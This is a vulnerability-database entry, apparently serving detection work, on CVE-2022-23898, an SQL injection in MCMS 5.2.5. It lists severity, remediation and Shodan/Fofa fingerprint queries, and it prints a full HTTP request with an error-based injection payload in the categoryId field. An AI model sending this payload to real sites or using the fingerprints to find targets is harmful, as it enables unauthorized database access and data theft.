🔙 목록으로 돌아가기

CVE-2022-23898: MCMS 5.2.5 - SQL Injection

TitleMCMS 5.2.5 - SQL Injection
AuthorCo5mos
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationApply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.
CVSS Score9.8
EPSS Score0.82815
CVE IDCVE-2022-23898
CWE IDCWE-89
Shodan Queryhttp.favicon.hash:1464851260http.favicon.hash:"1464851260"
Fofa Queryicon_hash="1464851260"
Tags cve cve2022 sqli mcms mingsoft vuln

🔍 Vulnerability Description

MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /cms/content/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.5
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

categoryId=1' and updatexml(1,concat(0x7e,md5(4404),0x7e),1) and 'zzz'='zzz

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23898.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23898.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A